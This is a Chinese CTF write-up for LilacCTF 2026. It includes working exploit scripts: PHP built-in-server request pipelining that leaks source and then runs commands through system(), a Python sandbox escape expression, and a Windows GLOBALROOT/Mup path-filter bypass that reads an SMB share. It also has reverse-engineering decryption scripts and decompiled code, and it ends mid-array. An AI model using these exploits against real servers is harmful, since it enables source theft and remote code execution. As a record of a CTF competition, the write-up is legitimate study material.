    Ok(())
}

结束

招新小广告

ChaMd5 Venom 招收大佬入圈

新成立组IOT+工控+样本分析长期招新

欢迎联系admin@chamd5.org

阅读原文

跳转微信打开

LilacCTF 2026 Writeup by Mini-Venom

Wed, 28 Jan 2026 08:04:00 +0800

原创 Mini-Venom 2026-01-28 08:04 辽宁

Web

keep

PHP<=7.4.21 Development Server源码泄露漏洞

import socket
host = "61.147.171.103"
port = 60598
target_file = "/index.php"
print(f"[*] 正在利用 PHP 内置服务器漏洞读取: {target_file}")
payload = (
f"GET {target_file} HTTP/1.1\r\n"
f"Host: {host}:{port}\r\n"
f"\r\n"
f"GET /robots.txt HTTP/1.1\r\n"
f"Host: {host}:{port}\r\n"
f"\r\n"
).encode()
try:
# 建立原始 TCP 连接
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    s.connect((host, port))
# 发送恶意数据包
    s.sendall(payload)
# 循环接收所有响应数据
    response = b""
whileTrue:
try:
            chunk = s.recv(4096)
ifnot chunk: break
            response += chunk
except socket.timeout:
break
    s.close()
# 解码并打印
    content = response.decode(errors='ignore')
    print("\n" + "="*20 + " 泄露的源码内容 " + "="*20)
    print(content)
    print("="*50)
if"in content:
        print("[+] 攻击成功！已获取 PHP 源码。")
else:
        print("[-] 未发现源码特征，可能是文件不存在或漏洞未触发。")
except Exception as e:
    print(f"[-] 发生错误: {e}")

HTTP/1.1 200 OK
Host: 61.147.171.103:59388
Date: Sat, 24 Jan 2026 03:36:07 +0000
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 92

@error_reporting(~E_ALL);
echo "Hello World!" . PHP_EOL;
// s3Cr37_f1L3.php.bak

读到了index.php的源码注释了一个后门备份文件s3Cr37_f1L3.php.bak

直接访问s3Cr37_f1L3.php是没有的
Pipelining 漏洞获取源码的那一套请求改成POST传参去RCE

import socket
defpwn(host, port, cmd):
# 目标文件
    target_php = "/s3Cr37_f1L3.php"
    target_bak = "/s3Cr37_f1L3.php.bak"
# 构造 PHP 载荷：ob_clean 清空干扰，echo 做标记，die 结束
    php_payload = f"ob_clean(); echo '---RESULT_START---'; system('{cmd}'); die();"
    post_data = f"admin={php_payload}"
# --- 请求 1: 源码泄露触发器 ---
    req1 = (
f"GET {target_bak} HTTP/1.1\r\n"
f"Host: {host}:{port}\r\n"
"\r\n"
    )
# --- 请求 2: RCE 注入载荷 ---
    req2 = (
f"POST {target_php} HTTP/1.1\r\n"
f"Content-Type: application/x-www-form-urlencoded\r\n"
f"Content-Length: {len(post_data)}\r\n"
"\r\n"
f"{post_data}"
    )
    full_packet = req1 + req2
try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(3)
        s.connect((host, port))
        s.sendall(full_packet.encode())
        response = b""
whileTrue:
try:
                chunk = s.recv(4096)
ifnot chunk: break
                response += chunk
except:
break
        s.close()
        res_text = response.decode(errors='ignore')
if"---RESULT_START---"in res_text:
            output = res_text.split("---RESULT_START---")[1].split("HTTP/1.1")[0].strip()
            print(f"\n[!!!] 成功！命令 [{cmd}] 执行结果：")
            print("-" * 40)
            print(output)
            print("-" * 40)
else:
            print("[-] 未能在响应中捕获到结果，正在检查原始回显...")
if"bin"in res_text or"etc"in res_text or"flag"in res_text:
                print("[!] 发现异常回显，请检查全文。")
else:
                print("[-] 可能是竞态失败，请尝试重新运行脚本。")
except Exception as e:
        print(f"[x] 网络错误: {e}")
if __name__ == "__main__":
    target_host = "61.147.171.35"
    target_port = 60598
    pwn(target_host, target_port, "ls /")

pwn(target_host, target_port, "cat /flag_489e4af2f8f070ca")

CheckIn

有源码泄露

#Python 3.14.2
import re
from collections import UserList
from sys import argv
classLockedList(UserList):
def__setitem__(self, key, value):
raise Exception("Assignment blocked!")
defsandbox():
if len(argv) != 2:
        print("ERROR: Missing code")
return
try:
        status = LockedList([False])
        status_id = id(status)
        user_input = argv[1].encode('idna').decode('ascii').rstrip('-')
if re.search(r'[0-9A-Z]', user_input):
            print("FORBIDDEN: No numbers or alphas")
return
if re.search(r'[_\s=+\[\],"\'\<\>\-\*@#$%^&\\\|\{\}\:;]', user_input):
            print("FORBIDDEN: Incorrect symbol detected")
return
if re.search(r'(status|flag|update|setattr|getattr|eval|exec|import|locals|os|sys|builtins|open|or|and|not|is|breakpoint|exit|print|quit|help|input|globals)', user_input.casefold()):
            print("FORBIDDEN: Keywords detected")
return
if len(user_input) > 60:
            print("FORBIDDEN: Input too long! Keep it concise and it is very simple.")
return
        eval(user_input)
if status[0] and id(status) == status_id:
with open('/flag', 'r') as f:
                flag = f.read().strip()
                print(f"SUCCESS! Flag: {flag}")
else:
            print(f"FAILURE: status is still {status}")
except Exception as e:
        print(f"Don't be evil~ And I won't show you this error :)")
if __name__ == '__main__':
    sandbox()

看怎么绕过了

尝试不同输入后得到以下现象：

含数字或字母：FORBIDDEN: No numbers or alphas 或 Don't be evil~
关键字（如 globals()）：FORBIDDEN: Keywords detected
纯符号如 () 可过，但会返回 FAILURE: status is still [False]

只能使用极少量内建函数与符号，避免触发关键词与数字/字母限制。

在函数作用域内 dir() 只返回 3 个变量：

status
status_d
user_input

因此

min(dir()) == "status"（字典序最小）
vars().get(min(dir())) 拿到 status
status 是一个列表，内容是 [False]

思路：把 False 变成真值并写回列表。

pop() 取出 False
~False == -1（真值）
append() 回去，status 变为真值，触发成功分支

vars().get(min(dir())).append(~vars().get(min(dir())).pop())

Path

curl "http://1.95.51.2:8080/api/info"17:27
{"data":{"challenge":"Path Maze","hints":["Stage 1: Find and read the access token from the system","Stage 2: Use the token to access the backup server","Token location: C:\\token\\access_key.txt","Backup server: 172.20.0.10","Backup server SMB Share name: backup","Flag file: flag.txt"],"stages":2,"version":"1.0.0"},"success":true}
curl "http://1.95.51.2:8080/api/diag/read?path=\\\\?\\C:\\token\\access_key.txt"17:43
{"message":"Access key verified! Here is your Stage 2 token.","success":true,"token":"VkItj49Xn9FoSZ2LMVHkswO3WRMMs4b2ESxWsE7GzeA","token_expires_in":300}

有token了，看看怎么绕过拿flag

GLBOALROOT+UNC绕过+大小写绕过

?globalrootdeviceMup172.20.0.10backupflag.txt

import requests
# 目标配置
BASE_URL_READ = "http://1.95.51.2:8080/api/diag/read"
BASE_URL_EXPORT = "http://1.95.51.2:8080/api/export/read"
TOKEN_FILE = r"C:\token\access_key.txt"
# 目标：远程 SMB 共享上的 Flag
TARGET_FLAG = r"172.20.0.10\backup\flag.txt"
defget_token():
"""Stage 1: 利用 \\?\ 本地设备路径绕过，读取 Token"""
    path = f"\\\\?\\{TOKEN_FILE}"
try:
        r = requests.get(BASE_URL_READ, params={"path": path}, timeout=5)
if r.status_code == 200and r.json().get("success"):
return r.json().get("token")
except: pass
returnNone
defexploit_stage2(token):
"""Stage 2: 利用全小写 globalroot 和 device 绕过关键字过滤"""
# 核心 Payload:
# 1. \\?\ : 禁用 Win32 路径解析，直通内核
# 2. globalroot (小写) : 绕过对 "GlobalRoot" 的过滤，指向 NT 根目录
# 3. device (小写) : 绕过对 "Device" 的过滤，指向设备目录
# 4. Mup : Multiple UNC Provider，负责处理 SMB 请求
    payload = f"\\\\?\\globalroot\\device\\Mup\\{TARGET_FLAG}"
    print(f"[+] Payload: {payload}")
    r = requests.get(BASE_URL_EXPORT, params={"path": payload, "token": token})
    print(f"[*] Response: {r.text}")
if __name__ == "__main__":
    token = get_token()
if token:
        print(f"[+] Got Token: {token}")
        exploit_stage2(token)
else:
        print("[-] Token retrieval failed")

Reverse

c++++

起调试跟到主要加密逻辑

跟进加密函数主要逻辑在这

key通过调试能取出来

随后跟进CA40函数是一个16轮的feistel加密直接写ida python

import idc
import idautils
import idaapi
defdecrypt():
    base = idaapi.get_imagebase()
    addr_keysched = base + 0x7C890
    addr_g = base + 0x7CC20
# void* keySchedule(void* ctx, const char* key, int keyLen)
    key_schedule_proto = "unsigned __int64 __fastcall keySchedule(void *ctx, void *key, int keyLen);"
# uint32 gFunc(void* ctx, int x, void* ignored)
    g_func_proto = "unsigned int __fastcall gFunc(void *ctx, int x, void *ignored);"
    idc.SetType(addr_keysched, key_schedule_proto)
    idc.SetType(addr_g, g_func_proto)
    ctx_ptr = idc.Appcall.alloc(0x200)
    key_ptr = idc.Appcall.alloc(16)
    K = [0x3b2e1065,0x44e02f99,0x9b058402,0x103d95fe,0x36d04254,0xc03d3d6c,0x33ae7077,0x5e4b6f12,0xcbf66d1d,0xd33faafa,
0x8ff6629f,0x295b34a6,0xffada42f,0x071c3dec,0x4bb66ff3,0x6545fc3e,0xf1058c24,0x2aa9e3e6,0x7c9960ab,0x1dfa44f8,0xdfde13e6,0xb1eda4ec,
0x79c84cbb,0xec255766,0xae2bee89,0xbeed6ee1,0x9e51a3b6,0x4a61c8f5,0x442489c3,0x0054cf01,0x330e8292,0x8b46f776,0xe4f5a900,0x7f44ce43,
0xf47024f6,0x94544823,0x789eba95,0xb3066287,0x4ad6f1a4,0x1e85d4cc]
defrol32(x, n):
return ((x << (n & 31)) & 0xFFFFFFFF) | (x >> (32 - (n & 31)))
defror32(x, n):
return (x >> (n & 31)) | ((x << (32 - (n & 31))) & 0xFFFFFFFF)
defg(x):
return idc.Appcall.gFunc(ctx_ptr, x & 0xFFFFFFFF, 0)
defdecrypt_block(ct_bytes):
defu32le(b, off):
return (b[off] | (b[off+1] << 8) | (b[off+2] << 16) | (b[off+3] << 24)) & 0xFFFFFFFF
        r = [
            u32le(ct_bytes, 0) ^ K[4],
            u32le(ct_bytes, 4) ^ K[5],
            u32le(ct_bytes, 8) ^ K[6],
            u32le(ct_bytes, 12) ^ K[7]
        ]
for round_idx in range(15, -1, -1):
if round_idx < 15:
                r[0], r[2] = r[2], r[0]
                r[1], r[3] = r[3], r[1]
            t0 = g(r[0])
            t1 = g(rol32(r[1], 8))
            f0 = (t0 + t1 + K[8 + 2 * round_idx]) & 0xFFFFFFFF
            f1 = (t0 + (2 * t1) + K[9 + 2 * round_idx]) & 0xFFFFFFFF
            r[2] = (rol32(r[2], 5) ^ f0) & 0xFFFFFFFF
            r[3] = (ror32(r[3] ^ f1, 5)) & 0xFFFFFFFF
        p = [
            (r[0] ^ K[0]) & 0xFFFFFFFF,
            (r[1] ^ K[1]) & 0xFFFFFFFF,
            (r[2] ^ K[2]) & 0xFFFFFFFF,
            (r[3] ^ K[3]) & 0xFFFFFFFF
        ]
        out = []
for val in p:
            out += [val & 0xFF, (val >> 8) & 0xFF, (val >> 16) & 0xFF, (val >> 24) & 0xFF]
return out
    ct_hex = "A20492152735B4F6ECBAA359DB64417BDF277A73B085666034CF38E748D8FBD4"
    ct_bytes = bytes.fromhex(ct_hex)
    pt = decrypt_block(ct_bytes[0:16]) + decrypt_block(ct_bytes[16:32])
while pt and pt[-1] == 0:
        pt.pop()
    token = "".join(map(chr, pt))
    print(f"Token: {token}")
    print(f"Hex: {bytes(pt).hex()}")
if __name__ == "__main__":
    decrypt()
#LilacCTF{I_ju3t_w@nnA_b3_hapPy}

λm

在 AST 里识有出 3 个 Z 调用：

读取输入，主逻辑与一个辅助递归逻辑。

输入 32 字节（256 bits）映射成一个固定结构的巨大布尔二叉树，叶子全是 Church Bool。拓展成一个 256 *256 的矩阵，

每修改一位，矩阵会出现 256 位的变化，初步猜测可能是行列填充或者是 circulant matrix 的对角线填充。

出现了 8 次 [lambda __: lambda _: _, lambda __: lambda _: _][ & 1] 的处理，猜测是 256（32 * 8），应该是对输入逐位处理。

还有 4 个纯常量（闭包环境为空）生成的 256-bit bit-tree。

感觉前面的不太对，重新整理一下：

类似于：

core = Z(arg0_lambda)(arg1_expr)(ID)(node16_value)
result = core(TRUE)(1)(0)

Z = lambda f: (lambda x: f(lambda v: x(x)(v)))(lambda x: f(lambda v: x(x)(v)))

ID = lambda x: x

node16_value = node16.func( input_expr_value )

arg0_lambda：一个闭包（无自由变量）的递归函数生成器（用于比较/递归遍历）

arg1_expr：一个巨大常量结构

node16.func 是必包的，能单独 eval 出来。

3 个 z_call：

Z_call0: gen_arity=4, has_subscript=False
Z_call1: gen_arity=4, has_subscript=True
Z_call2: gen_arity=4, has_subscript=False

z_call0 应该是主函数，z_call1 时读取并处理数据，z_call2 暂且认为是个辅助递归函数。

在 z_call1 里：

TRUE = (lambda t: lambda f: t)
FALSE = (lambda t: lambda f: f)
PAIR = (lambda a: lambda b: lambda f: f(a)(b))

读取时：

每个字节会被展开成 8 个 Church Bool（LSB→MSB），然后用 PAIR 做成一棵完美平衡树：

pair(pair(pair(b0,b1), pair(b2,b3)), pair(pair(b4,b5), pair(b6,b7)))

172064d8b6712022735da8fc088ca07ff344596e8bbca22b75df360b5226e31bb3a2f9f284

Kilogram

脱壳机先脱个壳随后ida打开附件具体分析如下

__int64 __fastcall sub_1400021E7(__int64 a1, __int64 a2)
{
int v2; // r9d
int v3; // edx
int v4; // r8d
int v5; // r9d
int v6; // r9d
int v7; // edx
int v8; // r8d
int v9; // r9d
  __int64 v10; // rdx
  __int64 v11; // rdx
int v12; // r9d
int v13; // r9d
int v14; // edx
int v15; // r8d
int v16; // r9d
  __int64 v17; // rdx
int v18; // edx
int v19; // r8d
int v20; // r9d
char *v21; // rsi
unsigned __int64 v22; // rdi
int v23; // edx
int v24; // r8d
int v25; // r9d
int v26; // r8d
int v27; // r9d
int v28; // r9d
int v29; // r9d
int v30; // edx
int v31; // r8d
int v32; // r9d
  __int64 v33; // rdx
int v34; // r9d
int v35; // edx
int v36; // r8d
int v37; // r9d
  __int64 v38; // rbx
int v39; // edx
int v40; // r8d
int v41; // r9d
  __int64 v42; // rax
  __int64 v43; // rdx
int v44; // edx
int v45; // r8d
int v46; // r9d
int v47; // edx
unsigned __int64 v48; // rbx
int v49; // r8d
int v50; // r9d
  _BYTE *v51; // rax
char v52; // dl
  _BYTE *v53; // rax
int v54; // ecx
unsigned __int64 v55; // rax
int v56; // edx
int v57; // r8d
int v58; // r9d
int v59; // edx
unsigned __int64 v60; // rbx
int v61; // r8d
int v62; // r9d
  _BYTE *v63; // rax
char v64; // dl
  _BYTE *v65; // rax
int v66; // ecx
unsigned __int64 v67; // rax
int v68; // edx
int v69; // r8d
int v70; // r9d
int v71; // edx
int v72; // r8d
int v73; // r9d
int v74; // r8d
int v75; // r9d
int v76; // edx
int v77; // r8d
int v78; // r9d
int v79; // esi
int v80; // edx
int v81; // r8d
int v82; // r9d
int v83; // ebx
int v84; // edx
int v85; // r8d
int v86; // r9d
int v87; // r8d
int v88; // r9d
int v89; // edx
int v90; // r8d
int v91; // r9d
int v92; // esi
int v93; // edx
int v94; // r8d
int v95; // r9d
int v96; // ebx
int v97; // edx
int v98; // r8d
int v99; // r9d
int v100; // r8d
int v101; // r9d
int v102; // edx
int v103; // r8d
int v104; // r9d
int v105; // esi
int v106; // edx
int v107; // r8d
int v108; // r9d
int v109; // ebx
int v110; // edx
int v111; // r8d
int v112; // r9d
int v113; // r8d
int v114; // r9d
int v115; // r8d
int v116; // r9d
int v117; // edx
int v118; // r8d
int v119; // r9d
int v120; // edx
int v121; // r8d
int v122; // r9d
int v123; // ebx
int v124; // edx
int v125; // r8d
int v126; // r9d
int v127; // r8d
int v128; // r9d
int v129; // edx
int v130; // r8d
int v131; // r9d
  __int64 v132; // rbx
int v133; // edx
int v134; // r8d
int v135; // r9d
  __int64 v136; // rax
  __int64 v137; // rdx
int v138; // edx
int v139; // r8d
int v140; // r9d
int v141; // edx
int v142; // r8d
int v143; // r9d
int v144; // edx
int v145; // r8d
int v146; // r9d
int v147; // edx
int v148; // r8d
int v149; // r9d
int v150; // edx
int v151; // r8d
int v152; // r9d
int v153; // edx
int v154; // r8d
int v155; // r9d
  __int64 v157; // [rsp+0h] [rbp-80h]
  __int64 v158; // [rsp+0h] [rbp-80h]
  __int64 v159; // [rsp+0h] [rbp-80h]
  __int64 v160; // [rsp+0h] [rbp-80h]
  __int64 v161; // [rsp+0h] [rbp-80h]
  __int64 v162; // [rsp+0h] [rbp-80h]
  __int64 v163; // [rsp+0h] [rbp-80h]
  __int64 v164; // [rsp+0h] [rbp-80h]
  __int64 v165; // [rsp+0h] [rbp-80h]
  __int64 v166; // [rsp+0h] [rbp-80h]
  __int64 v167; // [rsp+0h] [rbp-80h]
  __int64 v168; // [rsp+0h] [rbp-80h]
  __int64 v169; // [rsp+0h] [rbp-80h]
  __int64 v170; // [rsp+0h] [rbp-80h]
  __int64 v171; // [rsp+0h] [rbp-80h]
  __int64 v172; // [rsp+0h] [rbp-80h]
  __int64 v173; // [rsp+0h] [rbp-80h]
  __int64 v174; // [rsp+0h] [rbp-80h]
  __int64 v175; // [rsp+0h] [rbp-80h]
  __int64 v176; // [rsp+0h] [rbp-80h]
  __int64 v177; // [rsp+0h] [rbp-80h]
  __int64 v178; // [rsp+0h] [rbp-80h]
  __int64 v179; // [rsp+0h] [rbp-80h]
  __int64 v180; // [rsp+0h] [rbp-80h]
  __int64 v181; // [rsp+0h] [rbp-80h]
  __int64 v182; // [rsp+0h] [rbp-80h]
  __int64 v183; // [rsp+0h] [rbp-80h]
  __int64 v184; // [rsp+0h] [rbp-80h]
  __int64 v185; // [rsp+0h] [rbp-80h]
  __int64 v186; // [rsp+0h] [rbp-80h]
  __int64 v187; // [rsp+0h] [rbp-80h]
  __int64 v188; // [rsp+0h] [rbp-80h]
  __int64 v189; // [rsp+0h] [rbp-80h]
  __int64 v190; // [rsp+0h] [rbp-80h]
  __int64 v191; // [rsp+0h] [rbp-80h]
  __int64 v192; // [rsp+0h] [rbp-80h]
  __int64 v193; // [rsp+0h] [rbp-80h]
  __int64 v194; // [rsp+0h] [rbp-80h]
  __int64 v195; // [rsp+0h] [rbp-80h]
  __int64 v196; // [rsp+0h] [rbp-80h]
  __int64 v197; // [rsp+0h] [rbp-80h]
  __int64 v198; // [rsp+0h] [rbp-80h]
  __int64 v199; // [rsp+0h] [rbp-80h]
  __int64 v200; // [rsp+0h] [rbp-80h]
  __int64 v201; // [rsp+8h] [rbp-78h]
  __int64 v202; // [rsp+8h] [rbp-78h]
  __int64 v203; // [rsp+8h] [rbp-78h]
  __int64 v204; // [rsp+8h] [rbp-78h]
  __int64 v205; // [rsp+8h] [rbp-78h]
  __int64 v206; // [rsp+8h] [rbp-78h]
  __int64 v207; // [rsp+10h] [rbp-70h]
  __int64 v208; // [rsp+10h] [rbp-70h]
  __int64 v209; // [rsp+10h] [rbp-70h]
  __int64 v210; // [rsp+10h] [rbp-70h]
  __int64 v211; // [rsp+10h] [rbp-70h]
  __int64 v212[2]; // [rsp+20h] [rbp-60h] BYREF
char v213[24]; // [rsp+30h] [rbp-50h] BYREF
  __int64 v214; // [rsp+48h] [rbp-38h] BYREF
char sbox[288]; // [rsp+50h] [rbp-30h] BYREF
char v216[32]; // [rsp+170h] [rbp+F0h] BYREF
char key2[32]; // [rsp+190h] [rbp+110h] BYREF
char v218[32]; // [rsp+1B0h] [rbp+130h] BYREF
char v219[32]; // [rsp+1D0h] [rbp+150h] BYREF
char key1[32]; // [rsp+1F0h] [rbp+170h] BYREF
char v221[32]; // [rsp+210h] [rbp+190h] BYREF
char v222[24]; // [rsp+230h] [rbp+1B0h] BYREF
char v223; // [rsp+248h] [rbp+1C8h] BYREF
char v224; // [rsp+249h] [rbp+1C9h] BYREF
char v225; // [rsp+24Ah] [rbp+1CAh] BYREF
char Mode[13]; // [rsp+24Bh] [rbp+1CBh] BYREF
  __int64 v227; // [rsp+258h] [rbp+1D8h] BYREF
  __int64 v228; // [rsp+260h] [rbp+1E0h] BYREF
char v229; // [rsp+26Fh] [rbp+1EFh] BYREF
  __int64 v230; // [rsp+270h] [rbp+1F0h] BYREF
  __int64 v231; // [rsp+278h] [rbp+1F8h] BYREF
size_t Size; // [rsp+280h] [rbp+200h] BYREF
  __int64 v233; // [rsp+288h] [rbp+208h] BYREF
size_t v234; // [rsp+290h] [rbp+210h] BYREF
  __int64 v235; // [rsp+298h] [rbp+218h] BYREF
size_t v236; // [rsp+2A0h] [rbp+220h] BYREF
  __int64 v237; // [rsp+2A8h] [rbp+228h] BYREF
size_t v238; // [rsp+2B0h] [rbp+230h] BYREF
  __int64 v239[5]; // [rsp+2B8h] [rbp+238h] BYREF
unsigned __int8 v240; // [rsp+2E7h] [rbp+267h]
  __int64 v241; // [rsp+2E8h] [rbp+268h]
  __int64 v242; // [rsp+2F0h] [rbp+270h]
int v243; // [rsp+2FCh] [rbp+27Ch]
  __int64 v244; // [rsp+300h] [rbp+280h]
unsigned __int64 n; // [rsp+308h] [rbp+288h]
int m; // [rsp+314h] [rbp+294h]
unsigned __int64 k; // [rsp+318h] [rbp+298h]
int i; // [rsp+324h] [rbp+2A4h]
int v249; // [rsp+328h] [rbp+2A8h]
int j; // [rsp+32Ch] [rbp+2ACh]
  sub_140002DC7();
  v239[4] = &v223;
  sub_140008F50(a1, a2, 32, v222, &v223, v2);
  sub_1400073E0(a1, a2, v3, &v223, v4, v5);
  v239[3] = &v224;
  sub_140008F50(a1, a2, 32, v221, &v224, v6);
  sub_1400073E0(a1, a2, v7, &v224, v8, v9);
  sub_140001E9D(a1, a2, v10, v222);
  sub_140001E9D(a1, a2, v11, v221);
  (sha512)(a1, a2, v222, key1, v221, v12, v157);// 对key1进行sha512 长度64
  v239[2] = &v225;
  sub_140008F50(a1, a2, 32, v219, &v225, v13);//salt长度32
  sub_1400073E0(a1, a2, v14, &v225, v15, v16);
  sub_140001E9D(a1, a2, v17, v219);
  (sub_140008F30)(a1, a2, v18, v218, v19, v20, v158);
  qmemcpy(Mode, "Lilac+present", sizeof(Mode));
  v21 = Mode;
  v22 = 13LL;
  v228 = (sub_140008B20)(13, Mode, v23, v218, v24, v25, v159);
  (sub_1400067E0)(13, Mode, &v228, &v227, v26, v27, v160);
  v212[0] = Mode;                               
  v212[1] = 13LL;
  (PBKDF2)(13, Mode, v227, v218, v212, v28, v161);
  (sha512)(13, Mode, v218, key2, v219, v29, v162);// sha512 拼接 通过PBKDF2计算key2 
  v244 = (fopen)(13LL, Mode, "rb", "flag");//打开flag
if ( v244 )
  {
    (fseek)(13LL, Mode, 0LL, v244, 2LL);
    v243 = (ftell)(13LL, Mode, v33, v244);
    (fseek)(13LL, Mode, 0LL, v244, 0LL);
    v239[1] = &v229;
    sub_140008F50(13, Mode, v243, v216, &v229, v34);
    sub_1400073E0(13, Mode, v35, &v229, v36, v37);
    v38 = v243;
    v42 = (sub_140008B50)(13, Mode, v39, v216, v40, v41, v163);
    v242 = sub_140004728(13LL, Mode, 1LL, v42, v38, v244);
    sub_140004718(13LL, Mode, v43, v244);
if ( v242 == v243 )
    {
for ( i = 0; i <= 255; ++i )
      {
        v44 = i + 4;
        sbox[i + 32] = i + 4;                   // 魔改点
      }
      v249 = 0;
for ( j = 0; j <= 255; ++j )
      {
        v47 = sbox[j + 32];
        LODWORD(v21) = v47 + v249;
        v48 = j;
        v22 = (sub_140006C60)(v22, v47 + v249, v47, key1, v45, v46, v164);
        v51 = (sub_140009350)(v22, v21, v48 % v22, key1, v49, v50, v165, v201);
        v52 = v21 + *v51;
        LODWORD(v51) = ((v21 + *v51) >> 31) >> 24;
        v249 = (v51 + v52) - v51;
        v240 = sbox[j + 32];
        sbox[j + 32] = sbox[v249 + 32];
        v44 = v240;
        sbox[v249 + 32] = v240;
      }
for ( k = 0LL; ; ++k )
      {
        v55 = (sub_140006C60)(v22, v21, v44, v216, v45, v46, v164);
if ( k >= v55 )
break;
        v53 = (sub_140009350)(v22, v21, k, v216, v57, v58, v166, v201);
        v54 = *v53;
        v44 = v54 ^ sbox[k + 32];
        *v53 = v54 ^ sbox[k + 32];              // 对flag进行加密，与sbox进行xor
      }
for ( m = 0; m <= 255; ++m )
      {
        v56 = m + 4;
        sbox[m + 32] = m + 4;
      }
      v249 = 0;
for ( j = 0; j <= 255; ++j )
      {
        v59 = sbox[j + 32];
        LODWORD(v21) = v59 + v249;
        v60 = j;
        v22 = (sub_140006C60)(v22, v59 + v249, v59, key2, v57, v58, v166);
        v63 = (sub_140009350)(v22, v21, v60 % v22, key2, v61, v62, v167, v201);
        v64 = v21 + *v63;
        LODWORD(v63) = ((v21 + *v63) >> 31) >> 24;
        v249 = (v63 + v64) - v63;
        v240 = sbox[j + 32];
        sbox[j + 32] = sbox[v249 + 32];
        v56 = v240;
        sbox[v249 + 32] = v240;
      }
for ( n = 0LL; ; ++n )
      {
        v67 = (sub_140006C60)(v22, v21, v56, key1, v57, v58, v166);
if ( n >= v67 )
break;
        v65 = (sub_140009350)(v22, v21, n, key1, v69, v70, v168, v201);
        v66 = *v65;
        v56 = v66 ^ sbox[n + 32];
        *v65 = v66 ^ sbox[n + 32];              // 对key1进行加密，加密同上
      }
      (sub_140008F30)(v22, v21, v68, sbox, v69, v70, v168);
      v214 = '___calil';                        // 文件头
      v231 = (sub_140008B20)(v22, v21, v71, sbox, v72, v73, v169);
      (sub_1400067E0)(v22, v21, &v231, &v230, v74, v75, v170);
      sub_140008D50(v22, v21, v230, sbox, &v214, sbox, v171, v201, v207);
      v79 = (sub_140008B20)(v22, v21, v76, key1, v77, v78, v172);// // 加载 key1
      v83 = (sub_140008B80)(v22, v79, v80, key1, v81, v82, v173);// 拼接到 8 字节之后 key1的长度是64字节
// 所以salt应该在64+8=72开始 到72+32=104结束
      v233 = (sub_140008B20)(v22, v79, v84, sbox, v85, v86, v174);
      (sub_1400067E0)(v22, v79, &v233, &Size, v87, v88, v175);
      (memcpy)(v22, v79, Size, sbox, v83, v79, v176, v202, v208);
      v92 = (sub_140008B20)(v22, v79, v89, v219, v90, v91, v177);
      v96 = (sub_140008B80)(v22, v92, v93, v219, v94, v95, v178);
      v235 = (sub_140008B20)(v22, v92, v97, sbox, v98, v99, v179);
      (sub_1400067E0)(v22, v92, &v235, &v234, v100, v101, v180);
      (memcpy)(v22, v92, v234, sbox, v96, v92, v181, v203, v209);
      v105 = (sub_140008B20)(v22, v92, v102, v216, v103, v104, v182);
      v109 = (sub_140008B80)(v22, v105, v106, v216, v107, v108, v183);
      v237 = (sub_140008B20)(v22, v105, v110, sbox, v111, v112, v184);
      (sub_1400067E0)(v22, v105, &v237, &v236, v113, v114, v185);
      (memcpy)(v22, v105, v236, sbox, v109, v105, v186, v204, v210);
      (md5)(v22, v105, v216, v213, v115, v116, v187, v205);
      v21 = (sub_140008B20)(v22, v105, v117, v213, v118, v119, v188);
      v123 = (sub_140008B80)(v22, v21, v120, v213, v121, v122, v189);
      v239[0] = (sub_140008B20)(v22, v21, v124, sbox, v125, v126, v190);
      (sub_1400067E0)(v22, v21, v239, &v238, v127, v128, v191);
      (memcpy)(v22, v21, v238, sbox, v123, v21, v192, v206, v211);
      v241 = (fopen)(v22, v21, "wb", "./flag.enc");//写入密文
if ( v241 )
      {
        v132 = (sub_140006C60)(v22, v21, v129, sbox, v130, v131, v193);
        v136 = (sub_140008B50)(v22, v21, v133, sbox, v134, v135, v194);
        sub_140004740(v22, v21, 1LL, v136, v132, v241);
        sub_140004718(v22, v21, v137, v241);
      }
      sub_140008FD0(v22, v21, v129, v213, v130, v131, v193);
      sub_140008FD0(v22, v21, v138, sbox, v139, v140, v195);
    }
    sub_140008FD0(v22, v21, v44, v216, v45, v46, v164);
  }
  sub_140008FD0(v22, v21, v30, key2, v31, v32, v163);
  sub_140008FD0(v22, v21, v141, v218, v142, v143, v196);
  sub_140008FD0(v22, v21, v144, v219, v145, v146, v197);
  sub_140008FD0(v22, v21, v147, key1, v148, v149, v198);
  sub_140008FD0(v22, v21, v150, v221, v151, v152, v199);
  sub_140008FD0(v22, v21, v153, v222, v154, v155, v200);
return0LL;
}

通过findcrypt找到md5以及sha512

用我自己的文件进行测试发现最后是文件的md5值文件头就是lilac___

所以文件格式大概是

[ "lilac___" ]
[ metadata blocks ]后续推出是salt+key1的密文
[ RC4-encrypted flag ] 加密的flag，也就是密文
[ md5 校验数据 ]

理论上key1，key2应该能调试出来，但是调试的时候怎么调也调不起来，所以直接复现下算法求key1，key2，最后解密flag

写完脚本发现文件头什么也不是

于是回去重新看算法，发现sha512有魔改。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

所以交给ai写了个库函数，稍作修改

import struct
MASK = (1 << 64) - 1
# 初始向量 IV
H0 = [
0x6a09e667f3bcc908, 0xbb67ae8584caa73b,
0x3c6ef372fe94f82b, 0xa54ff53a5f1d36f1,
0x510e527fade682d1, 0x9b05688c2b3e6c1f,
0x1f83d9abfb41bd6b, 0x5be0cd19137e2179,
]
# K 常量（80 个）
K = [
0x428a2f98d728ae22, 0x7137449123ef65cd,
0xb5c0fbcfec4d3b2f, 0xe9b5dba58189dbbc,
0x3956c25bf348b538, 0x59f111f1b605d019,
0x923f82a4af194f9b, 0xab1c5ed5da6d8118,
0xd807aa98a3030242, 0x12835b0145706fbe,
0x243185be4ee4b28c, 0x550c7dc3d5ffb4e2,
0x72be5d74f27b896f, 0x80deb1fe3b1696b1,
0x9bdc06a725c71235, 0xc19bf174cf692694,
0xe49b69c19ef14ad2, 0xefbe4786384f25e3,
0x0fc19dc68b8cd5b5, 0x240ca1cc77ac9c65,
0x2de92c6f592b0275, 0x4a7484aa6ea6e483,
0x5cb0a9dcbd41fbd4, 0x76f988da831153b5,
0x983e5152ee66dfab, 0xa831c66d2db43210,
0xb00327c898fb213f, 0xbf597fc7beef0ee4,
0xc6e00bf33da88fc2, 0xd5a79147930aa725,
0x06ca6351e003826f, 0x142929670a0e6e70,
0x27b70a8546d22ffc, 0x2e1b21385c26c926,
0x4d2c6dfc5ac42aed, 0x53380d139d95b3df,
0x650a73548baf63de, 0x766a0abb3c77b2a8,
0x81c2c92e47edaee6, 0x92722c851482353b,
0xa2bfe8a14cf10364, 0xa81a664bbc423001,
